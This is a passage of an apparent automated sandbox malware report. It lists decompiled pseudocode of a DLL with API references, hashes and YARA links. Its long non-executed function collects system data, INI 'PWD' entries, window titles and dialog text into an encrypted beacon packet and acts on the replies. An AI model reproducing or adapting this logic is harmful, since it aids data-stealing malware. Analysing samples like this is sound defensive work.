                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000100,6F338CDE), ref: 6F33B4D3
                                                                                                                          • Part of subcall function 6F33B4B0: InterlockedExchange.KERNEL32(6F340620,00000000), ref: 6F33B4B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$Compare$CreateHeapSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1766302375-0
                                                                                                                        • Opcode ID: 458e1e2e6c865d59582693fcfbc10f7c7aac249789f366abcdd29742ecd9e20b
                                                                                                                        • Instruction ID: 047d3a78ef540c62b6ab8bdcb2a699144b53fbad22efb848229d2734342f84bf
                                                                                                                        • Opcode Fuzzy Hash: 458e1e2e6c865d59582693fcfbc10f7c7aac249789f366abcdd29742ecd9e20b
                                                                                                                        • Instruction Fuzzy Hash: 2BE04F33F05EB906DA11F7B578006DA65888F4266AB070069EA888A384CF2C884143E9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A590, Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A590() {
				void* _t7;
				intOrPtr* _t8;
				void _t9;
				void* _t11;

				_t7 =  *0x6f34095c; // 0x0
				if(_t7 == 0) {
					L4:
					_t7 = VirtualAlloc(0, 0x1000, 0x3000, 0x40); // executed
					if(_t7 != 0) {
						_t2 = _t7 + 0x20; // 0x20
						_t8 = _t2;
						 *((intOrPtr*)(_t7 + 4)) = 0;
						 *((intOrPtr*)(_t7 + 8)) = 0;
						_t11 = _t8 - _t7;
						do {
							 *_t8 =  *((intOrPtr*)(_t7 + 4));
							 *((intOrPtr*)(_t7 + 4)) = _t8;
							_t11 = _t11 + 0x20;
							_t8 = _t8 + 0x20;
						} while (_t11 <= 0xfe0);
						_t9 =  *0x6f34095c; // 0x0
						 *_t7 = _t9;
						 *0x6f34095c = _t7;
						return _t7;
					}
				} else {
					while( *((intOrPtr*)(_t7 + 4)) == 0) {
						_t7 =  *_t7;
						if(_t7 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L8;
					}
				}
				L8:
				return _t7;
			}







                                                                                                                        0x6f33a590
                                                                                                                        0x6f33a59a
                                                                                                                        0x6f33a5ab
                                                                                                                        0x6f33a5b8
                                                                                                                        0x6f33a5c0
                                                                                                                        0x6f33a5c2
                                                                                                                        0x6f33a5c2
                                                                                                                        0x6f33a5c7
                                                                                                                        0x6f33a5ca
                                                                                                                        0x6f33a5cd
                                                                                                                        0x6f33a5d0
                                                                                                                        0x6f33a5d3
                                                                                                                        0x6f33a5d5
                                                                                                                        0x6f33a5d8
                                                                                                                        0x6f33a5db
                                                                                                                        0x6f33a5de
                                                                                                                        0x6f33a5e6
                                                                                                                        0x6f33a5ec
                                                                                                                        0x6f33a5ee
                                                                                                                        0x00000000
                                                                                                                        0x6f33a5ee
                                                                                                                        0x00000000
                                                                                                                        0x6f33a5a0
                                                                                                                        0x6f33a5a5
                                                                                                                        0x6f33a5a9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33a5a9
                                                                                                                        0x6f33a5a0
                                                                                                                        0x6f33a5f4
                                                                                                                        0x6f33a5f4

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040,?,6F33A605,6F33B5E8,?,?,00000001,?,?,?,?,?,6F331FE4), ref: 6F33A5B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 4f85f58eaa47dc8818016362bc7f2c2614a78302f728362754fe28a4d3d3eaaf
                                                                                                                        • Instruction ID: 72dd918ccd6ede2807c16e126ef80c7819221652ca170d7c072f4386f8058921
                                                                                                                        • Opcode Fuzzy Hash: 4f85f58eaa47dc8818016362bc7f2c2614a78302f728362754fe28a4d3d3eaaf
                                                                                                                        • Instruction Fuzzy Hash: C1F0C2B6F06170CFEF12CF54D944A487BE5BB1AB10B11C05AE444DF264C770E881CB84
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A550, Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A550() {
				void* _t1;
				void* _t7;

				_t1 =  *0x6f34095c; // 0x0
				 *0x6f34095c = 0;
				if(_t1 != 0) {
					do {
						_t7 =  *_t1;
						VirtualFree(_t1, 0, 0x8000); // executed
						_t1 = _t7;
					} while (_t7 != 0);
					return _t1;
				}
				return _t1;
			}





                                                                                                                        0x6f33a550
                                                                                                                        0x6f33a555
                                                                                                                        0x6f33a561
                                                                                                                        0x6f33a570
                                                                                                                        0x6f33a570
                                                                                                                        0x6f33a57a
                                                                                                                        0x6f33a57c
                                                                                                                        0x6f33a57e
                                                                                                                        0x00000000
                                                                                                                        0x6f33a583
                                                                                                                        0x6f33a584

                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,6F33B535), ref: 6F33A57A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1263568516-0
                                                                                                                        • Opcode ID: 255d2b276bfcf8480f72973b36b534bec51f9a582e42728bca9e614b32164821
                                                                                                                        • Instruction ID: 2f79d25b72a4ad082ce7e980b9edb4b00356c9567f76c5dbf2a4012617fe2b02
                                                                                                                        • Opcode Fuzzy Hash: 255d2b276bfcf8480f72973b36b534bec51f9a582e42728bca9e614b32164821
                                                                                                                        • Instruction Fuzzy Hash: BFD01277B415619BFE50965A9D00B4267AC5B93B61F110115B940EB1A0D661EC158AA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33BB9C, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33BB9C() {
				void* _t1;

				_t1 = malloc(0x80); // executed
				 *0x6f34096c = _t1;
				 *0x6f340968 = _t1;
				if(_t1 != 0) {
					 *_t1 =  *_t1 & 0x00000000;
					return 0;
				} else {
					return _t1 + 1;
				}
			}




                                                                                                                        0x6f33bba1
                                                                                                                        0x6f33bba8
                                                                                                                        0x6f33bbad
                                                                                                                        0x6f33bbb4
                                                                                                                        0x6f33bbb8
                                                                                                                        0x6f33bbbd
                                                                                                                        0x6f33bbb6
                                                                                                                        0x6f33bbb7
                                                                                                                        0x6f33bbb7

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2803490479-0
                                                                                                                        • Opcode ID: 5e10893ca169395ace7940331e720eb5a4847a31a4242a51ef0dd2ff94a06f21
                                                                                                                        • Instruction ID: e6359331db8f602e5497fcd84ee77876ba91257e942673c0af8f0fad1d7cb4bd
                                                                                                                        • Opcode Fuzzy Hash: 5e10893ca169395ace7940331e720eb5a4847a31a4242a51ef0dd2ff94a06f21
                                                                                                                        • Instruction Fuzzy Hash: CDC012F2722A01CAEB809B29880431936E8FB46332F1094AAE800C90A8EF308054CB00
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 6F336D50, Relevance: 125.0, APIs: 65, Strings: 6, Instructions: 765memorytimewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E6F336D50(intOrPtr _a8, char _a49, char _a50) {
				intOrPtr _v0;
				char _v3;
				short _v572;
				short _v580;
				short _v1092;
				char _v1364;
				char _v1372;
				char _v1864;
				short _v1872;
				short _v1884;
				char _v1896;
				char _v1900;
				struct HWND__* _v1908;
				char _v1912;
				void* _v1928;
				struct HWND__* _v1932;
				void* _v1936;
				struct tagMSG _v1964;
				char _v1972;
				struct _FILETIME _v1980;
				void* _v1984;
				struct HWND__* _v1988;
				struct HWND__* _v1992;
				struct HWND__* _v1996;
				struct HWND__* _v2000;
				void _v2004;
				void* _v2008;
				void* _v2020;
				void* _v2024;
				void* _v2028;
				char _v2032;
				void* _v2036;
				void* _v2040;
				signed short _v2044;
				signed int _v2048;
				void* _v2052;
				char _v2068;
				void* _v2072;
				char _v2074;
				char _v2076;
				signed int _v2084;
				char _v2088;
				long _v2092;
				char _v2094;
				char _v2096;
				intOrPtr _v2100;
				struct HWND__* _v2104;
				void* _v2120;
				int _v2124;
				signed int _t251;
				signed int _t252;
				char _t254;
				WCHAR* _t255;
				int _t263;
				void* _t269;
				void* _t270;
				WCHAR* _t271;
				WCHAR* _t273;
				char _t275;
				char _t281;
				char _t284;
				void* _t288;
				CHAR* _t293;
				int _t294;
				char _t295;
				signed int _t296;
				void* _t299;
				signed char _t302;
				signed int _t303;
				CHAR* _t314;
				signed int _t316;
				signed int _t317;
				void* _t322;
				intOrPtr _t324;
				void* _t329;
				void* _t334;
				char _t344;
				long _t346;
				struct HWND__* _t370;
				char _t373;
				intOrPtr _t377;
				char _t379;
				void* _t380;
				signed int _t383;
				void* _t386;
				CHAR* _t395;
				struct HWND__* _t406;
				struct HWND__* _t407;
				signed int _t417;
				signed int _t422;
				signed short _t423;
				signed int _t424;
				CHAR* _t442;
				CHAR* _t443;
				CHAR* _t445;
				void* _t467;
				void* _t468;
				void* _t469;
				int _t470;
				void* _t471;
				struct HWND__* _t472;
				void* _t473;
				void* _t474;
				void _t475;
				intOrPtr* _t476;
				void* _t477;
				CHAR* _t478;
				void* _t479;
				void* _t481;
				void* _t486;
				signed short _t487;
				void* _t488;
				void* _t489;
				void* _t490;
				CHAR* _t492;
				char* _t493;
				char* _t494;
				void* _t495;
				signed int _t496;
				void* _t498;
				void* _t499;
				void* _t500;
				void* _t501;
				void* _t503;
				void* _t504;
				void* _t505;
				void* _t513;
				void* _t514;
				void* _t523;
				void* _t535;

				_t498 = (_t496 & 0xfffffff8) - 0x800;
				_push(0x14);
				_push( &_v1980);
				L6F33C2EE();
				_t370 = 0;
				_t481 = VirtualAlloc(0, 0x1000, 0x1000, 4);
				if(_t481 == 0) {
					L91:
					return 0;
				} else {
					_push(0x14);
					_push( &_v1864);
					L6F33C2EE();
					GetLocaleInfoW(0x400, 0x5a,  &_v1872, 9);
					CharLowerW( &_v1872);
					_push(0x9c);
					_push(0x6f3403a0);
					L6F33C2EE();
					_push( &_v2036);
					_push( &_v2032);
					_push( &_v2040);
					 *0x6f3403a0 = 0x9c;
					_v2040 = 0;
					_v2032 = 0;
					_v2036 = 0;
					L6F33C330();
					 *0x6f3403ac = _v2048 & 0x0000ffff;
					_t251 = M6F3404A8; // 0x6f240000
					 *0x6f3403a4 = _v2052;
					 *0x6f3403a8 = _v2044;
					 *0x6f34043a = 4;
					if(_t251 != 0) {
						_push(0x435a88);
						_push(1);
						_t417 =  &_v2032;
						_push(_t417);
						_push(_t251);
						_v2032 = 0x5e6f0892;
						_v2028 = 0;
						_v2024 = 0;
						_v2020 = 0;
						E6F331DB0();
						_t251 = _v2020;
						_t498 = _t498 + 0x10;
						if(_t251 != 0) {
							_v2072 = 0;
							_t251 =  *_t251(0, 0x65,  &_v2072);
							if(_t251 == 0) {
								_t251 = _v2084;
								if(_t251 != 0) {
									_t251 =  *(_t251 + 0x10) & 0x00001000;
									 *0x6f34043a = _t417 & 0xffffff00 | _t251 == 0x00001000;
								}
							}
						}
					}
					_push(0x34);
					_push(_t481);
					L6F33C2EE();
					 *((intOrPtr*)(_t481 + 2)) = 0x832eb9b;
					 *((short*)(_t481 + 6)) = 0x102;
					 *((char*)(_t481 + 8)) = 1;
					_t422 = M6F3404E4; // 0x76958bd5
					 *((intOrPtr*)(_t481 + 0x18)) = _t422;
					_t513 = M6F34050C - _t370; // 0x0
					_v2092 = _t370;
					_t252 = _t251 & 0xffffff00 | _t513 != 0x00000000;
					 *(_t481 + 9) = _t252;
					_t377 =  *0x6f3403a4; // 0x0
					 *((intOrPtr*)(_t481 + 0x1c)) = _t377;
					_t423 =  *0x6f3403a8; // 0x0
					 *(_t481 + 0x20) = _t423;
					_t514 = M6F3404EC - _t370; // 0x1
					 *((char*)(_t481 + 0xa)) = _t252 & 0xffffff00 | _t514 != 0x00000000;
					 *((short*)(_t481 + 0x12)) =  *0x6f34043a & 0x000000ff;
					_t424 =  *0x6f3403ac; // 0x0
					 *(_t481 + 0x24) = _t424;
					_t254 = M6F340544; // 0x1
					 *((char*)(_t481 + 0xc)) = _t254;
					_t379 = M6F340548; // 0x1
					 *((char*)(_t481 + 0xb)) = _t379;
					 *(_t481 + 0xf) = _t370;
					 *((char*)(_t481 + 0x11)) = 0x17;
					_t255 = M6F3404F8; // 0x99b7a8
					_t467 = E6F33A2F0(_t255, 1,  &_v2092);
					_t499 = _t498 + 0xc;
					if(_t467 != _t370) {
						_t47 = _t481 + 0x34; // 0x34
						RtlMoveMemory(_t47, _t467, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t467);
					}
					_t380 = M6F340504; // 0x99ec68
					_v2092 = _t370;
					_t468 = E6F33A2F0(_t380, 1,  &_v2092);
					_t500 = _t499 + 0xc;
					if(_t468 != _t370) {
						_t53 =  &_a49; // 0x35
						RtlMoveMemory(_t481 + _t53, _t468, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t468);
					}
					_t469 = _v2092 +  &_a50;
					_v2092 = _t370;
					_t486 = E6F33A2F0( &_v1900, 1,  &_v2092);
					_t501 = _t500 + 0xc;
					if(_t486 != _t370) {
						RtlMoveMemory(_t469 + _t481, _t486, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t486);
					}
					_t487 = _t469 + _v2092 + 1;
					_v2044 = _t487;
					_t470 = SetTimer(_t370, _t370, _t370, _t370);
					_v2068 = 0x28;
					_v2052 = 1;
					_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
					if(_t263 == _t370) {
						L90:
						VirtualFree(_t481, _t370, 0x8000);
						goto L91;
					} else {
						L15:
						L15:
						if(_v2052 == _t370) {
							_t383 = _v1964.message;
						} else {
							_t383 = 0x113;
							_v2052 = _t370;
							_v1964.message = 0x113;
							_v1964.hwnd = _t370;
							_v1964.wParam = _t470;
						}
						if(_t263 == 0xffffffff || _t383 == 0x10) {
							goto L89;
						}
						if(_t383 == 0x113) {
							if(_v1964.hwnd != _t370) {
								L87:
								DispatchMessageA( &_v1964);
								_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
								if(_t263 != _t370) {
									_t487 = _v2048;
									goto L15;
								}
								goto L90;
							}
							L24:
							if(_t523 != 0) {
								goto L87;
							}
							KillTimer(_t370, _t470);
							E6F336A90( &_v2028, _t370);
							_t269 = M6F3404D8; // 0x99b240
							_t270 = E6F3338A0(_t269, _t370, _t370, 1);
							_push(0x1000 - _t487);
							_t471 = _t481 + _t487;
							_push(_t471);
							 *((char*)(_t481 + 0xe)) = _t383 & 0xffffff00 | _t270 != 0x00000000;
							L6F33C2EE();
							_t271 = M6F3404F8; // 0x99b7a8
							_t386 = M6F340504; // 0x99ec68
							_v2104 = _t370;
							wsprintfW( &_v580, L"%s\\%s", _t386, _t271);
							_t273 = M6F3404D0; // 0x98a4d0
							_t503 = _t501 + 0x28;
							if(GetPrivateProfileStringW(L"PWD",  &_v572, _t370,  &_v1092, 0x103, _t273) != 0) {
								_t495 = E6F33A2F0( &_v1092, 1,  &_v2096);
								_t503 = _t503 + 0xc;
								if(_t495 != _t370) {
									RtlMoveMemory(_t471, _t495, _v2096);
									HeapFree(GetProcessHeap(), _t370, _t495);
								}
							}
							_t275 = _v2096;
							_v2092 = _t275 + _v2048 + 1;
							 *(_t481 + 0x30) = _t275;
							_t472 = GetForegroundWindow();
							_v1884 = 0;
							if(_t472 != _t370) {
								GetWindowTextW(_t472,  &_v1884, 0x104);
							}
							_v2096 = _t370;
							_t488 = E6F33A2F0( &_v1884, 1,  &_v2096);
							_t504 = _t503 + 0xc;
							if(_t488 != _t370) {
								RtlMoveMemory(_t481 + _v2092, _t488, _v2096);
								HeapFree(GetProcessHeap(), _t370, _t488);
							}
							_t489 = _v2092 + _v2096 + 1;
							_v1884 = 0;
							_v2096 = _t370;
							if(_t472 != _t370) {
								_v2088 = _t370;
								GetWindowThreadProcessId(_t472,  &_v2088);
								_t344 = _v2088;
								if(_t344 > _t370) {
									_v1936 = _t344;
									asm("pxor xmm0, xmm0");
									_v2092 = _t370;
									_v1932 = _t370;
									_v1928 = 0x18;
									asm("movq [esp+0xd0], xmm0");
									asm("movq [esp+0xd8], xmm0");
									_v1908 = _t370;
									_t346 = NtOpenProcess( &_v2092, 0x410,  &_v1928,  &_v1936);
									if(_t346 >= 0) {
										_push(0x104);
										_push( &_v1896);
										_push(_t370);
										_push(_v2104);
										L6F33C38A();
										if(_t346 != 0) {
											_t479 = E6F33A2F0( &_v1912, 1,  &_v2124);
											_t504 = _t504 + 0xc;
											if(_t479 != _t370) {
												RtlMoveMemory(_t481 + _t489, _t479, _v2124);
												HeapFree(GetProcessHeap(), _t370, _t479);
											}
										}
										NtClose(_v2120);
									}
								}
							}
							_t281 = 0;
							_t473 = _v2096 +  &_v3;
							_v2092 = _t473;
							_v2096 = 0;
							_t535 =  *0x6f340398 - _t370; // 0x0
							if(_t535 == 0) {
								L54:
								_t474 = _t473 + _t281 + 1;
								_v2068 = 1;
								if(_t281 > 1) {
									_t406 =  *0x6f340398; // 0x0
									_t492 = _t474 + _t481;
									_t281 = GetDlgItemTextA(_t406, 0x4e83, _t492, 0xfff - _t474);
									_v2096 = _t281;
									if(_t281 > _t370 &&  *_t481 == 0x2d) {
										_t281 = 0;
										_v2096 = 0;
										 *_t492 = 0;
										 *((char*)(_t474 + _t481 + 1)) = 0;
									}
								}
								_v1992 = _t370;
								_v1988 = _t370;
								_v2000 = _t370;
								_v1996 = _t370;
								_t475 = _t474 + _t281 + 1;
								_v2072 = _t370;
								 *(_t481 + 0x2c) = _t370;
								 *(_t481 + 0x28) = _t370;
								if(_v1964.message != 0x83fe) {
									L61:
									 *((char*)(_t481 + 0xd)) = 0;
									 *(_t481 + 0x14) = _t370;
									goto L62;
								} else {
									_t334 = _v1964.lParam;
									if(_t334 == _t370) {
										goto L61;
									}
									 *((char*)(_t481 + 0xd)) =  *((intOrPtr*)(_t334 + 0x10));
									 *(_t481 + 0x14) =  *(_t334 + 4);
									_v1992 =  *((intOrPtr*)(_t334 + 0x14));
									_v1988 =  *(_t334 + 0x18);
									_v2072 = _t334;
									 *(_t481 + 0x2c) =  *(_t334 + 0x18);
									L62:
									_push( &_v2088);
									_push( &_v2092);
									_v2092 = _t370;
									_v2088 = _t370;
									_v1980.dwHighDateTime = E6F3366E0();
									_t284 = _v2088;
									_push(1);
									_v1996 = _t284;
									_v2000 = _v2092;
									 *(_t481 + 0x28) = _t284;
									 *_t481 = _t475;
									E6F3353F0(_v2024, _v2028, _t481, _t475);
									_t287 = _v1992;
									_t505 = _t504 + 0x1c;
									_v2008 = _t481;
									_v2004 = _t475;
									if(_v1992 != _t370) {
										_push(1);
										E6F3353F0(_v2024, _v2028, _t287, _v1988);
										_t505 = _t505 + 0x14;
									}
									_push("k");
									_push( &_v2028);
									_t288 = E6F335690();
									_push(_t370);
									_t490 = _t288;
									E6F3353F0(_v2024, _v2028, _t481, _t475);
									_t501 = _t505 + 0x1c;
									if(_v1980.dwHighDateTime != _t370) {
										VirtualFree(_v2092, _t370, 0x8000);
									}
									_v2088 = _t370;
									if(_t490 <= _t370) {
										L77:
										_push(8);
										_push( &_v1972);
										L6F33C2EE();
										GetSystemTimeAsFileTime( &_v1980);
										_v2052 = _v1980.dwLowDateTime;
										_v2048 = _v1980.dwHighDateTime;
										_v2092 = _t370;
										RtlTimeToSecondsSince1970( &_v2052,  &_v2092);
										_t395 = M6F3404CC; // 0x99d818
										_t293 = M6F3404DC; // 0x99b1c8
										_v2096 = 0x6467;
										_v2094 = 0;
										_t294 = GetPrivateProfileIntA(_t293,  &_v2096, _t370, _t395);
										if(_t294 != _t370) {
											if(_t294 <= _v2100) {
												E6F336A90(_t370, _t370);
												_t501 = _t501 + 8;
											}
										} else {
											_t302 = _v2028;
											_t303 = _t302 & 0x000000ff;
											if(_t302 == 0) {
												_t303 = 1;
											}
											wsprintfA( &_v1372, "%lu", _t303 * 0xe10 + _v2100);
											_t442 = M6F3404CC; // 0x99d818
											_t501 = _t501 + 0xc;
											_t443 = M6F3404DC; // 0x99b1c8
											WritePrivateProfileStringA(_t443,  &_v2088,  &_v1364, _t442);
										}
										goto L83;
									} else {
										if(_t490 >= 0x12) {
											_push(_t370);
											E6F3353F0(_v2024, _v2028, _v1984, _t490);
											_t476 = _v1984;
											_t501 = _t501 + 0x14;
											if( *_t476 == 0x832eb9b) {
												_t314 = M6F3404CC; // 0x99d818
												_t445 = M6F3404DC; // 0x99b1c8
												_v2088 = 1;
												_v2076 = 0x6467;
												_v2074 = 0;
												WritePrivateProfileStringA(_t445,  &_v2076, _t370, _t314);
												_t316 =  *(_t476 + 4) & 0x0000ffff;
												 *0x6f340000 = _t316;
												if(_t316 < 0xa) {
													 *0x6f340000 = 0x3c;
												}
												_t317 =  *(_t476 + 0xc) & 0x0000ffff;
												if(_t317 <= _t370) {
													_push(_t370);
													_push(_t370);
													_push(_t370);
													_push(_t370);
												} else {
													_push( *(_t476 + 0xa) & 0x000000ff);
													_t329 = _v1984;
													_push( *(_t476 + 0xb) & 0x000000ff);
													_push(_t317 + _t329 + 0x13);
													_push(_t329 + 0x12);
												}
												E6F3369C0();
												_t501 = _t501 + 0x10;
												if( *((intOrPtr*)(_t476 + 0x10)) > _t370) {
													_t322 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
													_v0 =  *((intOrPtr*)(_t476 + 6));
													_t477 = E6F33A360(( *(_t476 + 0xc) & 0x0000ffff) + _v1984 + ( *(_t476 + 0xe) & 0x0000ffff) + 0x14, 1, 0);
													_t324 = E6F33A2F0(_t477, 0, 0);
													_t501 = _t501 + 0x18;
													_a8 = _t324;
													HeapFree(GetProcessHeap(), 0, _t477);
													CloseHandle(CreateThread(0, 0, E6F335B40, _t322, 0, 0));
													Sleep(0x1f4);
													_t370 = 0;
												}
											}
										}
										HeapFree(GetProcessHeap(), _t370, _v1984);
										if(_v2088 != _t370) {
											L83:
											_t295 = _v2088;
											if(_t295 != _t370) {
												_t299 =  *_t295;
												if(_t299 != _t370) {
													SetEvent(_t299);
												}
											}
											_t296 =  *0x6f340000; // 0x3c
											_t470 = SetTimer(_t370, _t370, _t296 * 0x3e8, _t370);
											goto L87;
										} else {
											goto L77;
										}
									}
								}
							} else {
								_t493 = 0;
								if(_v2068 <= _t370) {
									goto L54;
								}
								_v2072 = 0xfff - _t473;
								_t478 = _t473 + _t481;
								L42:
								L42:
								if(_t493 > 0) {
									Sleep(0x1f4);
								}
								_t407 =  *0x6f340398; // 0x0
								_t373 = GetDlgItemTextA(_t407, 0x4e82, _t478, _v2072);
								if( *_t481 == 0x2d || _t373 < 0xb) {
									goto L46;
								}
								_t494 = 0;
								if(_t373 <= 0) {
									L52:
									_t281 = _t373;
									_v2096 = _t281;
									L53:
									_t473 = _v2092;
									_t370 = 0;
									goto L54;
								} else {
									goto L49;
								}
								do {
									L49:
									if(StrTrimA( &(_t478[_t494]), " ") != 0) {
										_t373 = _t373 - 1;
									}
									_t494 =  &_v3;
								} while (_t494 < _t373);
								goto L52;
								L46:
								_t281 = 0;
								_t493 =  &_v3;
								_v2096 = 0;
								 *_t478 = 0;
								if(_t493 < _v2068) {
									goto L42;
								}
								goto L53;
							}
						}
						_t523 = _t383 - 0x83fe;
						goto L24;
						L89:
						KillTimer(_t370, _t470);
						goto L90;
					}
				}
			}





































































































































                                                                                                                        0x6f336d56
                                                                                                                        0x6f336d60
                                                                                                                        0x6f336d66
                                                                                                                        0x6f336d67
                                                                                                                        0x6f336d78
                                                                                                                        0x6f336d81
                                                                                                                        0x6f336d85
                                                                                                                        0x6f33777c
                                                                                                                        0x6f337785
                                                                                                                        0x6f336d8b
                                                                                                                        0x6f336d8b
                                                                                                                        0x6f336d94
                                                                                                                        0x6f336d95
                                                                                                                        0x6f336dab
                                                                                                                        0x6f336db9
                                                                                                                        0x6f336dbf
                                                                                                                        0x6f336dc4
                                                                                                                        0x6f336dc9
                                                                                                                        0x6f336dd2
                                                                                                                        0x6f336dd7
                                                                                                                        0x6f336ddc
                                                                                                                        0x6f336ddd
                                                                                                                        0x6f336de7
                                                                                                                        0x6f336deb
                                                                                                                        0x6f336def
                                                                                                                        0x6f336df3
                                                                                                                        0x6f336e05
                                                                                                                        0x6f336e0a
                                                                                                                        0x6f336e0f
                                                                                                                        0x6f336e15
                                                                                                                        0x6f336e1b
                                                                                                                        0x6f336e24
                                                                                                                        0x6f336e26
                                                                                                                        0x6f336e2b
                                                                                                                        0x6f336e2d
                                                                                                                        0x6f336e31
                                                                                                                        0x6f336e32
                                                                                                                        0x6f336e33
                                                                                                                        0x6f336e3b
                                                                                                                        0x6f336e3f
                                                                                                                        0x6f336e43
                                                                                                                        0x6f336e47
                                                                                                                        0x6f336e4c
                                                                                                                        0x6f336e50
                                                                                                                        0x6f336e55
                                                                                                                        0x6f336e5f
                                                                                                                        0x6f336e63
                                                                                                                        0x6f336e67
                                                                                                                        0x6f336e69
                                                                                                                        0x6f336e6f
                                                                                                                        0x6f336e74
                                                                                                                        0x6f336e81
                                                                                                                        0x6f336e81
                                                                                                                        0x6f336e6f
                                                                                                                        0x6f336e67
                                                                                                                        0x6f336e55
                                                                                                                        0x6f336e87
                                                                                                                        0x6f336e89
                                                                                                                        0x6f336e8a
                                                                                                                        0x6f336e8f
                                                                                                                        0x6f336e96
                                                                                                                        0x6f336e9c
                                                                                                                        0x6f336ea0
                                                                                                                        0x6f336ea6
                                                                                                                        0x6f336ea9
                                                                                                                        0x6f336eaf
                                                                                                                        0x6f336eb3
                                                                                                                        0x6f336eb6
                                                                                                                        0x6f336eb9
                                                                                                                        0x6f336ebf
                                                                                                                        0x6f336ec2
                                                                                                                        0x6f336ec8
                                                                                                                        0x6f336ecb
                                                                                                                        0x6f336ed4
                                                                                                                        0x6f336ede
                                                                                                                        0x6f336ee2
                                                                                                                        0x6f336ee8
                                                                                                                        0x6f336eeb
                                                                                                                        0x6f336ef0
                                                                                                                        0x6f336ef3
                                                                                                                        0x6f336efe
                                                                                                                        0x6f336f01
                                                                                                                        0x6f336f05
                                                                                                                        0x6f336f09
                                                                                                                        0x6f336f16
                                                                                                                        0x6f336f18
                                                                                                                        0x6f336f1d
                                                                                                                        0x6f336f25
                                                                                                                        0x6f336f29
                                                                                                                        0x6f336f37
                                                                                                                        0x6f336f37
                                                                                                                        0x6f336f3d
                                                                                                                        0x6f336f4f
                                                                                                                        0x6f336f58
                                                                                                                        0x6f336f5a
                                                                                                                        0x6f336f5f
                                                                                                                        0x6f336f67
                                                                                                                        0x6f336f6c
                                                                                                                        0x6f336f7a
                                                                                                                        0x6f336f7a
                                                                                                                        0x6f336f93
                                                                                                                        0x6f336f97
                                                                                                                        0x6f336fa0
                                                                                                                        0x6f336fa2
                                                                                                                        0x6f336fa7
                                                                                                                        0x6f336fb3
                                                                                                                        0x6f336fc1
                                                                                                                        0x6f336fc1
                                                                                                                        0x6f336fce
